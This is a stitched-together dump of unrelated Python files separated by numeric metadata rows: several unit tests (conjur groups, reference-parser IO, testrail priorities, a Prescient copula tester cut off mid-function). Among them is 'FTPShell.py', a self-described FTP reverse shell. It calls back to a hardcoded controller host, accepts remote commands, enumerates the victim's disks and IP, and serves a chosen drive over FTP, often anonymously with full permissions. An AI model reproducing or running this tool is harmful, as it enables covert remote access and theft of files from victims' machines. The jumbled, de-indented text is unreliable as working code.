# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from mock import patch
import conjur
api = conjur.new_from_key('foo', 'bar')
group = api.group('v1/admins')
def test_group():
assert group.role.kind == 'group'
assert group.role.identifier == 'v1/admins'
assert group.role.roleid == api.config.account + ':group:v1/admins'
@patch.object(group.role, 'grant_to')
def test_add_member(mock_grant_to):
member = api.user('foo')
group.add_member(member)
mock_grant_to.assert_called_with(member, False)
@patch.object(group.role, 'grant_to')
def test_add_member_admin(mock_grant_to):
member = api.role('something', 'else')
group.add_member(member, True)
mock_grant_to.assert_called_with(member, True)
@patch.object(group.role, 'revoke_from')
def test_remove_member(mock_revoke_from):
member = api.user('foo')
group.remove_member(member)
mock_revoke_from.assert_called_with(member)
| 37.132075
| 82
| 0.757622
| 299
| 1,968
| 4.87291
| 0.424749
| 0.060398
| 0.030199
| 0.041181
| 0.154427
| 0.104324
| 0.104324
| 0.059025
| 0.059025
| 0.059025
| 0
| 0.004207
| 0.154472
| 1,968
| 52
| 83
| 37.846154
| 0.871394
| 0.533537
| 0
| 0.173913
| 0
| 0
| 0.101336
| 0
| 0
| 0
| 0
| 0
| 0.26087
| 1
| 0.173913
| false
| 0
| 0.086957
| 0
| 0.26087
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5fa0436f9f5d626cf4b365a484376d1f5343ee15
| 5,046
|
py
|
Python
|
FTPShell/FTPShell.py
|
dsogo/H4CKING
|
58aaaabc25995dbff9aa4985e8308a963772b87e
|
[
"MIT"
] | 17
|
2020-10-07T01:37:32.000Z
|
2021-12-11T21:23:25.000Z
|
FTPShell/FTPShell.py
|
Al0nnso/H4CKING
|
58aaaabc25995dbff9aa4985e8308a963772b87e
|
[
"MIT"
] | null | null | null |
FTPShell/FTPShell.py
|
Al0nnso/H4CKING
|
58aaaabc25995dbff9aa4985e8308a963772b87e
|
[
"MIT"
] | 8
|
2020-09-22T03:14:51.000Z
|
2022-03-07T16:03:24.000Z
|
from pyftpdlib.authorizers import DummyAuthorizer
from pyftpdlib.handlers import FTPHandler
from multiprocessing import Process
from pyftpdlib import servers
from time import sleep
from requests import get
import socket
import psutil
import win32api
# Al0nnso - 2019
# FTP Reverse Shell
# NOT TESTED ON AN EXTERNAL NETWORK
try:
ip = get('https://api.ipify.org').text
except:
ip='ERROR'
pass
ftp=None
server = None
disk = "\\"
address = ("0.0.0.0", 21)
user = None
host = '192.168.15.5'# YOUR IP OR HOST
port = 443
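# ftp_main() starts a pyftpdlib FTP server on port 21 exposing the requested disk;
# credentials depend on the 'user' argument (anonymous when user is None).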
def ftp_main(server, address, disk, user, s, ip):
print('FTP STARTING...')
try:
authorizer = DummyAuthorizer()
try:
try:
s.send('FTP starting...: {}'.format(ip).encode())
except:
pass
print('TRYING...')
if disk.isalpha():
disk = '{}:\\'.format(disk)
if user == None:
authorizer.add_anonymous(disk)
elif user == '/user':
authorizer.add_user('user', '404', disk, perm="elradfmwMT")
else:
authorizer.add_user(user, user, disk, perm="elradfmwMT")
except:
authorizer.add_anonymous("\\")
handler = FTPHandler
handler.authorizer = authorizer
address = ("0.0.0.0", 21)
server = servers.FTPServer(address, FTPHandler)
try:
s.send('[+] FTP server started on ftp://{}:21'.format(ip).encode())
except:
pass
server.serve_forever()
except Exception as e:
sleep(10)
        print('reconnecting...')
        try:
            s.send('reconnecting...'.encode())
except:
pass
print(e)
        ftp_main(server, address, disk, user, s, ip)
def socketConn(ftp):
try:
global address, disk, user, host, port, server, ip
# server=None
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send('[+] Connected'.encode())
while True:
Fdata = s.recv(3000)
Fdata = Fdata.decode()
if len(Fdata) > 0 or Fdata == " ":
print(Fdata)
data = str(Fdata).split(" ")
if 'exit' in data[0].lower():
try:
ftp.terminate()
s.send('ftp closed'.encode())
except:
s.send('WTF exit?'.encode())
elif data[0].lower()=='ip' or data[0].lower()=='inf':
s.send(str(ip).encode())
elif data[0].lower()=='disk' or data[0].lower()=='d':#LIST DISK
try:
disks=None
disks=psutil.disk_partitions()
s.send(str(disks).replace(',','\n').encode())
except:
s.send('FAIL DISK'.encode())
elif data[0].lower()=='vol' or data[0].lower()=='v':#LIST VOL OF DISK
try:
drives = win32api.GetLogicalDriveStrings()
drives = drives.split('\000')[:-1]
s.send((str(drives).replace("\'","")).encode())
except Exception as e:
s.send('FAIL VOL: {}'.format(e).encode())
elif (data[0].lower() == 'start'):
mode = data[0].lower()
print(len(data))
for i in range(len(data)):
print(str(i))
if mode == 'start' and '-D' in data[i].upper():
if data[i + 1].isalpha():
disk = data[i + 1].upper()
s.send('DISK: {}'.format(disk).encode())
if mode == 'start' and '-U' in data[i].upper():
user = data[i + 1]
s.send('USER: {}'.format(user).encode())
if mode == 'start' and '-A' in data[i].upper():
addr = data[i + 1]
print('addr: {}'.format(addr))
try:
address = (addr, 21)
s.send('address: {}'.format(address).encode())
except:
s.send('fail to set addr...'.encode())
s.send(' '.encode())
if ftp!=None:
ftp.terminate()
s.send('ftp closed'.encode())
ftp = Process(target=ftp_main,args=(server, address, disk, user, s, ip))
ftp.start()
else:
s.send(' '.encode())
else:
s.send(' '.encode())
except Exception as e:
        print('Socket reconnection...')
print(e)
s = None
sleep(2)
socketConn(ftp)
if __name__ == '__main__':
socketConn(ftp)
| 35.535211
| 92
| 0.441538
| 509
| 5,046
| 4.339882
| 0.273084
| 0.043006
| 0.040742
| 0.027162
| 0.179267
| 0.062472
| 0.028972
| 0
| 0
| 0
| 0
| 0.022177
| 0.419144
| 5,046
| 141
| 93
| 35.787234
| 0.731491
| 0.022989
| 0
| 0.320611
| 0
| 0
| 0.082284
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.015267
| false
| 0.030534
| 0.068702
| 0
| 0.083969
| 0.076336
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5fa103b113b3be7f53cb7ec2e64ba88c2cf38693
| 8,321
|
py
|
Python
|
tests/test_io.py
|
wellcometrust/deep_reference_parser
|
b58e4616f4de9bfe18ab41e90f696f80ab876245
|
[
"MIT"
] | 13
|
2020-02-19T02:09:00.000Z
|
2021-12-16T23:15:58.000Z
|
tests/test_io.py
|
wellcometrust/deep_reference_parser
|
b58e4616f4de9bfe18ab41e90f696f80ab876245
|
[
"MIT"
] | 33
|
2020-02-12T11:21:51.000Z
|
2022-02-10T00:48:17.000Z
|
tests/test_io.py
|
wellcometrust/deep_reference_parser
|
b58e4616f4de9bfe18ab41e90f696f80ab876245
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# coding: utf-8
import os
import pytest
from deep_reference_parser.io.io import (
read_jsonl,
write_jsonl,
load_tsv,
write_tsv,
_split_list_by_linebreaks,
_unpack,
)
from deep_reference_parser.reference_utils import yield_token_label_pairs
from .common import TEST_JSONL, TEST_TSV_TRAIN, TEST_TSV_PREDICT, TEST_LOAD_TSV
@pytest.fixture(scope="module")
def tmpdir(tmpdir_factory):
return tmpdir_factory.mktemp("data")
def test_unpack():
before = [
(
("token0", "token1", "token2", "token3"),
("label0", "label1", "label2", "label3")
),
(
("token0", "token1", "token2"),
("label0", "label1", "label2")
),
]
expected = [
(
("token0", "token1", "token2", "token3"),
("token0", "token1", "token2"),
),
(
("label0", "label1", "label2", "label3"),
("label0", "label1", "label2")
),
]
actual = _unpack(before)
assert expected == actual
def test_write_tsv(tmpdir):
expected = (
(
("the", "focus", "in", "Daloa", ",", "Côte", "d’Ivoire]."),
("Bulletin", "de", "la", "Société", "de", "Pathologie"),
("Exotique", "et"),
),
(
("i-r", "i-r", "i-r", "i-r", "i-r", "i-r", "i-r"),
("i-r", "i-r", "i-r", "i-r", "i-r", "i-r"),
("i-r", "i-r"),
),
)
token_label_tuples = list(yield_token_label_pairs(expected[0], expected[1]))
PATH = os.path.join(tmpdir, "test_tsv.tsv")
write_tsv(token_label_tuples, PATH)
actual = load_tsv(os.path.join(PATH))
assert expected == actual
def test_load_tsv_train():
"""
Text of TEST_TSV_TRAIN:
```
the i-r
focus i-r
in i-r
Daloa i-r
, i-r
Côte i-r
d’Ivoire]. i-r
Bulletin i-r
de i-r
la i-r
Société i-r
de i-r
Pathologie i-r
Exotique i-r
et i-r
```
"""
expected = (
(
("the", "focus", "in", "Daloa", ",", "Côte", "d’Ivoire]."),
("Bulletin", "de", "la", "Société", "de", "Pathologie"),
("Exotique", "et"),
),
(
("i-r", "i-r", "i-r", "i-r", "i-r", "i-r", "i-r"),
("i-r", "i-r", "i-r", "i-r", "i-r", "i-r"),
("i-r", "i-r"),
),
)
actual = load_tsv(TEST_TSV_TRAIN)
assert len(actual[0][0]) == len(expected[0][0])
assert len(actual[0][1]) == len(expected[0][1])
assert len(actual[0][2]) == len(expected[0][2])
assert len(actual[1][0]) == len(expected[1][0])
assert len(actual[1][1]) == len(expected[1][1])
assert len(actual[1][2]) == len(expected[1][2])
assert actual == expected
def test_load_tsv_predict():
"""
Text of TEST_TSV_PREDICT:
```
the
focus
in
Daloa
,
Côte
d’Ivoire].
Bulletin
de
la
Société
de
Pathologie
Exotique
et
```
"""
expected = (
(
("the", "focus", "in", "Daloa", ",", "Côte", "d’Ivoire]."),
("Bulletin", "de", "la", "Société", "de", "Pathologie"),
("Exotique", "et"),
),
)
actual = load_tsv(TEST_TSV_PREDICT)
assert actual == expected
def test_load_tsv_train_multiple_labels():
"""
Text of TEST_TSV_TRAIN:
```
the i-r a
focus i-r a
in i-r a
Daloa i-r a
, i-r a
Côte i-r a
d’Ivoire]. i-r a
Bulletin i-r a
de i-r a
la i-r a
Société i-r a
de i-r a
Pathologie i-r a
Exotique i-r a
et i-r a
token
```
"""
expected = (
(
("the", "focus", "in", "Daloa", ",", "Côte", "d’Ivoire]."),
("Bulletin", "de", "la", "Société", "de", "Pathologie"),
("Exotique", "et"),
),
(
("i-r", "i-r", "i-r", "i-r", "i-r", "i-r", "i-r"),
("i-r", "i-r", "i-r", "i-r", "i-r", "i-r"),
("i-r", "i-r"),
),
(
("a", "a", "a", "a", "a", "a", "a"),
("a", "a", "a", "a", "a", "a"),
("a", "a"),
),
)
actual = load_tsv(TEST_LOAD_TSV)
assert actual == expected
def test_yield_token_label_pairs():
tokens = [
[],
["the", "focus", "in", "Daloa", ",", "Côte", "d’Ivoire]."],
["Bulletin", "de", "la", "Société", "de", "Pathologie"],
["Exotique", "et"],
]
labels = [
[],
["i-r", "i-r", "i-r", "i-r", "i-r", "i-r", "i-r"],
["i-r", "i-r", "i-r", "i-r", "i-r", "i-r"],
["i-r", "i-r"],
]
expected = [
(None, None),
("the", "i-r"),
("focus", "i-r"),
("in", "i-r"),
("Daloa", "i-r"),
(",", "i-r"),
("Côte", "i-r"),
("d’Ivoire].", "i-r"),
(None, None),
("Bulletin", "i-r"),
("de", "i-r"),
("la", "i-r"),
("Société", "i-r"),
("de", "i-r"),
("Pathologie", "i-r"),
(None, None),
("Exotique", "i-r"),
("et", "i-r"),
(None, None),
]
actual = list(yield_token_label_pairs(tokens, labels))
assert expected == actual
def test_read_jsonl():
expected = [
{
"text": "a b c\n a b c",
"tokens": [
{"text": "a", "start": 0, "end": 1, "id": 0},
{"text": "b", "start": 2, "end": 3, "id": 1},
{"text": "c", "start": 4, "end": 5, "id": 2},
{"text": "\n ", "start": 5, "end": 7, "id": 3},
{"text": "a", "start": 7, "end": 8, "id": 4},
{"text": "b", "start": 9, "end": 10, "id": 5},
{"text": "c", "start": 11, "end": 12, "id": 6},
],
"spans": [
{"start": 2, "end": 3, "token_start": 1, "token_end": 2, "label": "b"},
{"start": 4, "end": 5, "token_start": 2, "token_end": 3, "label": "i"},
{"start": 7, "end": 8, "token_start": 4, "token_end": 5, "label": "i"},
{"start": 9, "end": 10, "token_start": 5, "token_end": 6, "label": "e"},
],
}
]
expected = expected * 3
actual = read_jsonl(TEST_JSONL)
assert expected == actual
def test_write_jsonl(tmpdir):
expected = [
{
"text": "a b c\n a b c",
"tokens": [
{"text": "a", "start": 0, "end": 1, "id": 0},
{"text": "b", "start": 2, "end": 3, "id": 1},
{"text": "c", "start": 4, "end": 5, "id": 2},
{"text": "\n ", "start": 5, "end": 7, "id": 3},
{"text": "a", "start": 7, "end": 8, "id": 4},
{"text": "b", "start": 9, "end": 10, "id": 5},
{"text": "c", "start": 11, "end": 12, "id": 6},
],
"spans": [
{"start": 2, "end": 3, "token_start": 1, "token_end": 2, "label": "b"},
{"start": 4, "end": 5, "token_start": 2, "token_end": 3, "label": "i"},
{"start": 7, "end": 8, "token_start": 4, "token_end": 5, "label": "i"},
{"start": 9, "end": 10, "token_start": 5, "token_end": 6, "label": "e"},
],
}
]
expected = expected * 3
temp_file = os.path.join(tmpdir, "file.jsonl")
write_jsonl(expected, temp_file)
actual = read_jsonl(temp_file)
assert expected == actual
def test_split_list_by_linebreaks():
lst = ["a", "b", "c", None, "d"]
expected = [["a", "b", "c"], ["d"]]
    actual = _split_list_by_linebreaks(lst)
    assert expected == actual
def test_list_by_linebreaks_ending_in_None():
lst = ["a", "b", "c", float("nan"), "d", None]
expected = [["a", "b", "c"], ["d"]]
    actual = _split_list_by_linebreaks(lst)
    assert expected == actual
def test_list_by_linebreaks_starting_in_None():
lst = [None, "a", "b", "c", None, "d"]
expected = [["a", "b", "c"], ["d"]]
    actual = _split_list_by_linebreaks(lst)
    assert expected == actual
| 24.259475
| 88
| 0.414373
| 1,020
| 8,321
| 3.254902
| 0.107843
| 0.063253
| 0.05241
| 0.06988
| 0.629819
| 0.558434
| 0.509036
| 0.483735
| 0.471386
| 0.471386
| 0
| 0.026336
| 0.361134
| 8,321
| 342
| 89
| 24.330409
| 0.598194
| 0.118736
| 0
| 0.502439
| 0
| 0
| 0.19671
| 0
| 0
| 0
| 0
| 0
| 0.068293
| 1
| 0.058537
| false
| 0
| 0.02439
| 0.004878
| 0.087805
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5fa141b264762a22f9a2b6309a86900f4d79fb07
| 389
|
py
|
Python
|
tests/unit/test_priorities.py
|
anshumangoyal/testrail-api
|
a9b2983a59667999a8432fa0af034c1fbd07e1cc
|
[
"MIT"
] | 21
|
2019-04-15T07:25:48.000Z
|
2022-03-19T04:21:43.000Z
|
tests/unit/test_priorities.py
|
anshumangoyal/testrail-api
|
a9b2983a59667999a8432fa0af034c1fbd07e1cc
|
[
"MIT"
] | 30
|
2019-04-15T07:18:59.000Z
|
2022-03-19T07:26:57.000Z
|
tests/unit/test_priorities.py
|
anshumangoyal/testrail-api
|
a9b2983a59667999a8432fa0af034c1fbd07e1cc
|
[
"MIT"
] | 16
|
2019-02-21T11:59:32.000Z
|
2022-02-23T17:33:16.000Z
|
import json
import responses
def test_get_priorities(api, mock, host):
mock.add_callback(
responses.GET,
'{}index.php?/api/v2/get_priorities'.format(host),
lambda x: (200, {}, json.dumps([{'id': 1, 'priority': 1}, {'id': 4, 'priority': 4}]))
)
resp = api.priorities.get_priorities()
assert resp[0]['id'] == 1
assert resp[1]['priority'] == 4
| 24.3125
| 93
| 0.59383
| 52
| 389
| 4.346154
| 0.519231
| 0.172566
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.039216
| 0.213368
| 389
| 15
| 94
| 25.933333
| 0.699346
| 0
| 0
| 0
| 0
| 0
| 0.164524
| 0.087404
| 0
| 0
| 0
| 0
| 0.181818
| 1
| 0.090909
| false
| 0
| 0.181818
| 0
| 0.272727
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5fa14c2eb69ff76b5ae4ab590ca445b49132d179
| 37,185
|
py
|
Python
|
prescient/gosm/tester.py
|
iSoron/Prescient
|
a3c1d7c5840893ff43dca48c40dc90f083292d26
|
[
"BSD-3-Clause"
] | 21
|
2020-06-03T13:54:22.000Z
|
2022-02-27T18:20:35.000Z
|
prescient/gosm/tester.py
|
iSoron/Prescient
|
a3c1d7c5840893ff43dca48c40dc90f083292d26
|
[
"BSD-3-Clause"
] | 79
|
2020-07-30T17:29:04.000Z
|
2022-03-09T00:06:39.000Z
|
prescient/gosm/tester.py
|
bknueven/Prescient
|
6289c06a5ea06c137cf1321603a15e0c96ddfb85
|
[
"BSD-3-Clause"
] | 16
|
2020-07-14T17:05:56.000Z
|
2022-02-17T17:51:13.000Z
|
# ___________________________________________________________________________
#
# Prescient
# Copyright 2020 National Technology & Engineering Solutions of Sandia, LLC
# (NTESS). Under the terms of Contract DE-NA0003525 with NTESS, the U.S.
# Government retains certain rights in this software.
# This software is distributed under the Revised BSD License.
# ___________________________________________________________________________
from timer import Timer,tic,toc
import unittest
from copula import GaussianCopula,FrankCopula,GumbelCopula,ClaytonCopula,StudentCopula, WeightedCombinedCopula
import numpy as np
import scipy
import scipy.integrate as spi
import scipy.special as sps
import scipy.stats as spst
from base_distribution import BaseDistribution,MultiDistr
from distributions import UnivariateEmpiricalDistribution, UnivariateEpiSplineDistribution
from distributions import UnivariateNormalDistribution,MultiNormalDistribution,UnivariateStudentDistribution, MultiStudentDistribution
from vine import CVineCopula,DVineCopula
import matplotlib.pyplot as plt
import copula_experiments
from copula_experiments.copula_diagonal import diag
from copula_experiments.copula_evaluate import RankHistogram,emd_sort,emd_pyomo
from distribution_factory import distribution_factory
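# Unit tests for the gosm distribution and copula classes: empirical, epi-spline, normal and Student
# distributions, copula CDFs and partial derivatives, vine copulas, rank histograms and EMD comparisons.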
class EmpiricalDistributionTester(unittest.TestCase):
def setUp(self):
points = [1, 1, 2, 2, 3, 5, 6, 8, 9]
self.distribution = UnivariateEmpiricalDistribution(points)
def test_at_point(self):
self.assertAlmostEqual(self.distribution.cdf(1), 2 / 10)
self.assertAlmostEqual(self.distribution.cdf_inverse(2 / 10), 1)
def test_before_first(self):
self.assertAlmostEqual(self.distribution.cdf(0.5), 1 / 10)
self.assertAlmostEqual(self.distribution.cdf_inverse(1 / 10), 0.5)
def test_far_before_first(self):
self.assertEqual(self.distribution.cdf(-4), 0)
def test_between_points(self):
self.assertAlmostEqual(self.distribution.cdf(4), 11 / 20)
self.assertAlmostEqual(self.distribution.cdf_inverse(11 / 20), 4)
def test_after_end(self):
self.assertAlmostEqual(self.distribution.cdf(9.5), 19 / 20)
self.assertAlmostEqual(self.distribution.cdf_inverse(19 / 20), 9.5)
def test_far_after_end(self):
self.assertAlmostEqual(self.distribution.cdf(20), 1)
class EpisplineTester(unittest.TestCase):
def setUp(self):
input_data = np.random.randn(1000)
self.distribution = UnivariateEpiSplineDistribution(input_data)
def test_cdf_values(self):
self.assertAlmostEqual(self.distribution.cdf(self.distribution.alpha), 0)
self.assertAlmostEqual(self.distribution.cdf(self.distribution.alpha - 100), 0)
self.assertAlmostEqual(self.distribution.cdf(self.distribution.beta), 1)
self.assertAlmostEqual(self.distribution.cdf(self.distribution.beta + 100), 1)
def test_region_probability(self):
# Tests the region probability by asserting the disjoint union of all regions must add up to 1
midpoint = (self.distribution.alpha + self.distribution.beta) / 2
integral_value = (self.distribution.region_probability((self.distribution.alpha, midpoint))
+ self.distribution.region_probability((midpoint, self.distribution.beta)))
self.assertAlmostEqual(integral_value, 1)
one_third_way = (2*self.distribution.alpha + self.distribution.beta) / 3
two_thirds_way = (self.distribution.alpha + 2*self.distribution.beta) / 3
integral_value = (self.distribution.region_probability((self.distribution.alpha, one_third_way))
+ self.distribution.region_probability((one_third_way, two_thirds_way))
+ self.distribution.region_probability((two_thirds_way, self.distribution.beta)))
self.assertAlmostEqual(integral_value, 1)
def test_quick(self):
print('Warning : this code must be called with runner.py')
# Copy this code at the beginning of copula_test to see if it works
# And enter python3 runner.py copula_experiments/run_test.txt
gosm_options.set_globals()
# Create output directory.
if not (os.path.isdir(gosm_options.output_directory)):
os.mkdir(gosm_options.output_directory)
X = np.arange(300)
tic()
mydistr = UnivariateEpiSplineDistribution(X)
for i in range(10):
print(mydistr.cdf(i))
toc()
class UnivariateNormalDistributionTester(unittest.TestCase):
def test_quick(self):
data = np.random.randn(1000)
dist = UnivariateNormalDistribution(input_data=data)
self.assertAlmostEqual(dist.rect_prob(-1.96,1.96),0.95,1)
def test_pdf_cdf(self):
x = -2 + 2 * np.random.randn(2000)
mydistr = UnivariateNormalDistribution(input_data=x)
res, i = spi.quad(mydistr.pdf, -1, 3)
self.assertAlmostEqual(res,mydistr.rect_prob(-1, 3),5)
def test_with_mean_var(self):
sigma = 2
mean = 3
data = sigma*np.random.randn(10000)+mean
dist = UnivariateNormalDistribution(input_data=data)
self.assertAlmostEqual(dist.cdf(4),0.6915,1)
dist = UnivariateNormalDistribution(mean = mean,var=sigma**2)
self.assertAlmostEqual(dist.cdf(4),0.6915,3)
class MultiNormalDistributionTester(unittest.TestCase):
def test_two_dimensions(self):
dimkeys = ["solar", "wind"]
dimension = len(dimkeys)
ourmean = [-4, 3]
ourcov = [[2, 0], [0, 2]]
lowerdict = {"solar": -1, "wind": 0}
upperdict = {"solar": 3, "wind": 4}
marginals = {"solar": UnivariateNormalDistribution(var=ourcov[0][0], mean=ourmean[0]),
"wind": UnivariateNormalDistribution(var=ourcov[1][1], mean=ourmean[1])}
data_array = np.random.multivariate_normal(ourmean, ourcov, 10000)
data_dict = dict.fromkeys(dimkeys)
for i in range(dimension):
data_dict[dimkeys[i]] = data_array[:, i]
dist = MultiNormalDistribution(dimkeys,input_data=data_dict)
dist2 = MultiNormalDistribution(dimkeys,mean=ourmean,cov=ourcov)
self.assertAlmostEqual(dist.rect_prob(lowerdict,upperdict),dist2.rect_prob(lowerdict,upperdict),2)
self.assertAlmostEqual(np.mean(dist.generates_X(n=1000)[:,1]),ourmean[1],1)
self.assertAlmostEqual(np.mean(dist.generates_X(n=1000)[:, 0]), ourmean[0], 1)
def test_with_gaussian_copula_1_dim(self):
mymean = 0
myvar = 2
dimkeys1 = ["solar"]
lowerdict = {"solar": -2}
upperdict = {"solar": 1}
data_array1 = np.random.multivariate_normal([mymean], [[myvar]], 10000)
data_dict1 = {"solar": data_array1[:, 0]}
marginals1 = {"solar": UnivariateNormalDistribution(input_data=data_array1[:, 0])}
unigaussian1 = GaussianCopula(input_data=data_dict1, dimkeys=dimkeys1, marginals=marginals1)
unigaussian2 = MultiNormalDistribution(dimkeys1, input_data=data_dict1)
self.assertAlmostEqual(unigaussian1.rect_prob(lowerdict, upperdict),unigaussian2.rect_prob(lowerdict, upperdict),3)
def test_with_gaussian_copula_2_dim(self):
dimkeys = ["solar", "wind"]
dimension = len(dimkeys)
ourmean = [3, 4]
ourmeandict = {"solar": 0, "wind": 0}
ourcov = [[1, 0.5], [0.5, 1]]
marginals = {"solar": UnivariateNormalDistribution(var=ourcov[0][0], mean=ourmean[0]),
"wind": UnivariateNormalDistribution(var=ourcov[1][1], mean=ourmean[1])}
valuedict = {"solar": 0, "wind": 0}
lowerdict = {"solar": 2, "wind": 3}
upperdict = {"solar": 4, "wind": 5}
data_array = np.random.multivariate_normal(ourmean, ourcov, 100000)
data_dict = dict.fromkeys(dimkeys)
for i in range(dimension):
data_dict[dimkeys[i]] = data_array[:, i]
multigaussian1 = GaussianCopula(input_data=data_dict, dimkeys=dimkeys, marginals=marginals, quadstep=0.001)
multigaussian2 = MultiNormalDistribution(dimkeys, input_data=data_dict)
valuedict = {"solar": 0.45, "wind": 0.89}
self.assertAlmostEqual(multigaussian1.rect_prob(lowerdict, upperdict),
multigaussian2.rect_prob(lowerdict, upperdict), 3)
def test_with_gaussian_copula_3_dim(self):
dimkeys = ["solar", "wind", "tide"]
dimension = len(dimkeys)
# dictin = {"solar": np.random.randn(200), "wind": np.random.randn(200)}
ourmean = [0, 0, 0]
ourcov = [[1, 0.1, 0.3], [0.1, 2, 0], [0.3, 0, 3]]
marginals = {"solar": UnivariateNormalDistribution(var=ourcov[0][0], mean=ourmean[0]),
"wind": UnivariateNormalDistribution(var=ourcov[1][1], mean=ourmean[1]),
"tide": UnivariateNormalDistribution(var=ourcov[2][2], mean=ourmean[2])}
valuedict = {"solar": 0, "wind": 0, "tide": 0}
lowerdict = {"solar": -1, "wind": -1, "tide": -1}
upperdict = {"solar": 1, "wind": 1, "tide": 1}
data_array = np.random.multivariate_normal(ourmean, ourcov, 1000)
data_dict = dict.fromkeys(dimkeys)
        for i in range(dimension):
            data_dict[dimkeys[i]] = data_array[:, i]
multigaussian1 = GaussianCopula(input_data=data_dict, dimkeys=dimkeys, marginals=marginals, quadstep=0.1)
multigaussian2 = MultiNormalDistribution(dimkeys, input_data=data_dict)
self.assertAlmostEqual(multigaussian1.rect_prob(lowerdict, upperdict),
multigaussian2.rect_prob(lowerdict, upperdict), 2)
self.assertAlmostEqual(multigaussian1.rect_prob(lowerdict, upperdict),multigaussian2.rect_prob(lowerdict, upperdict), 1)
class UnivariateStudentDistributionTester(unittest.TestCase):
def test_pdf_cdf(self):
x = -2 + 2 * np.random.randn(2000)
student = UnivariateStudentDistribution(input_data=x)
res, i = spi.quad(student.pdf, -1, 3)
self.assertAlmostEqual(res,student.rect_prob(-1, 3),5)
def test_in_student_copula_cdf(self):
dimkeys = ["solar", "wind"]
x = np.random.randn(2000)
dictin = {"solar": x, "wind": x + np.random.randn(2000)}
student = StudentCopula(dimkeys, dictin)
self.assertAlmostEqual(student._t(student._inverse_t(0.1)),0.1,7)
self.assertAlmostEqual(student._inverse_t(student._t(-6)),-6,7)
class MultiStudentDistributionTester(unittest.TestCase):
def test_generates_X(self):
x = np.random.randn(200)
dictin = {"solar": x, "wind": x + 0.5 * np.random.randn(200)}
dimkeys = ["solar", "wind"]
mydistr = MultiStudentDistribution(dictin)
print(mydistr.generates_X(10))
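# initialize() builds a distribution of the requested copula type from synthetic multivariate-normal
# samples in 1, 2 or 3 dimensions and returns it.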
def initialize(dim=2,precision = None,copula_string='independence-copula'):
if dim==1:
mymean = 0
myvar = 2
dimkeys = ["solar"]
data_array = np.random.multivariate_normal([mymean], [[myvar]], 1000)
dictin = {"solar": data_array[:, 0]}
distr_class = distribution_factory(copula_string)
mydistr = distr_class(dimkeys, dictin)
return mydistr
if dim==2:
        # For some tests, the Gaussian and Student copulas give less precise results, so we adjust the precision required:
dimkeys = ["solar", "wind"]
ourmean = [3, 4]
rho=0.5
ourcov = [[1, rho], [rho, 1]]
data_array = np.random.multivariate_normal(ourmean, ourcov, 1000)
dictin = dict.fromkeys(dimkeys)
for i in range(dim):
dictin[dimkeys[i]] = data_array[:, i]
valuedict = {"solar": 0.14, "wind": 0.49}
distr_class = distribution_factory(copula_string)
mydistr = distr_class(dimkeys, dictin)
return mydistr
if dim==3:
dimkeys = ["solar", "wind", "tide"]
dimension = len(dimkeys)
# dictin = {"solar": np.random.randn(200), "wind": np.random.randn(200)}
ourmean = [0, 0, 0]
rho01 = 0.1
rho02 = 0.3
rho12 = 0
ourcov = [[1, rho01, rho02], [rho01, 2, rho12], [rho02, rho12, 3]]
marginals = {"solar": UnivariateNormalDistribution(var=ourcov[0][0], mean=ourmean[0]),
"wind": UnivariateNormalDistribution(var=ourcov[1][1], mean=ourmean[1]),
"tide": UnivariateNormalDistribution(var=ourcov[2][2], mean=ourmean[2])}
data_array = np.random.multivariate_normal(ourmean, ourcov, 1000)
dictin = dict.fromkeys(dimkeys)
for i in range(dimension):
dictin[dimkeys[i]] = data_array[:, i]
distr_class = distribution_factory(copula_string)
mydistr = distr_class(dimkeys, dictin)
return mydistr
class CopulaTester(unittest.TestCase):
def test_quick(self,copula_string='independence-copula'):
mydistr = initialize(copula_string=copula_string)
valuedict = {"solar": 0.05, "wind": 0.12}
valuedict = {"solar": 1, "wind": 0.34}
self.assertAlmostEqual(mydistr.C(valuedict),0.34,3)
valuedict = {"solar": 0.47, "wind": 1}
self.assertAlmostEqual(mydistr.C(valuedict), 0.47,3)
def test_C_with_sample(self,copula_string='independence-copula',dim=2):
if dim==2:
mydistr = initialize(copula_string=copula_string, dim=2)
valuedict = {"solar": 0.05, "wind": 0.12}
self.assertAlmostEqual(mydistr.C(valuedict),mydistr.C_from_sample(valuedict),2)
if dim==3:
            if copula_string=='frank-copula' or copula_string=='clayton-copula' or copula_string=='gumbel-copula':
